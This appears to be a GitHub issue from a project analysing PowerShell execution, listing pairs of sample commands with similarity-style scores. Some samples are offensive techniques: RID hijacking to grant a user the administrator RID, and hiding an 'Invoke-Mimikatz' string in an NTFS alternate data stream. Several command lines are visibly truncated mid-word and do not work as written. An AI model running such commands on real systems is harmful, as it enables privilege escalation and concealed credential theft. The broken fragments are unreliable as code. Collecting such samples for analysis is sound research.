cridin1 / pwsh-execution-analysis

Analyzing PowerShell execution on Windows systems.

Example to fix #1

Closed cridin1 closed 9 months ago

cridin1 commented 9 months ago

8
command1: Invoke-RIDHijacking -User unina -RID 500
command2: Invoke-RIDHijacking -User unina -RID 500
0.13 3 41 4

30
command1: $stream = Get-Stream -Name 'evadump' ; Add-Type -TypeDefinition @' using System; using System.Runtime.InteropServices; public class EventStream { [DllImport('evadump.dll')] public statienStream(IntPtr hWndNewOwner); [DllImport('evadump.dll')] public static extern bool CloseStream(); [DllImport('evadump.dll')] public static extern IntPtr GetData(uint uFormat); [DllImport('evadum static extern IntPtr GlobalLock(IntPtr hMem); [DllImport('evadump.dll')] public static extern bool GlobalUnlock(IntPtr hMem); [DllImport('evadump.dll')] public static extern int GlobalSize(IntPtrream.OpenStream([IntPtr]::Zero) $stream.CloseStream()
command2: $content = 'Invoke-Mimikatz'; $file = 'C:\normal.txt'; $stream = 'C:\normal.txt:hidden'; Set-Content -Path $file -Value 'This is a normal file'; Add-Content -Path $stream -Value $contenPath $stream
0.93 51 57 53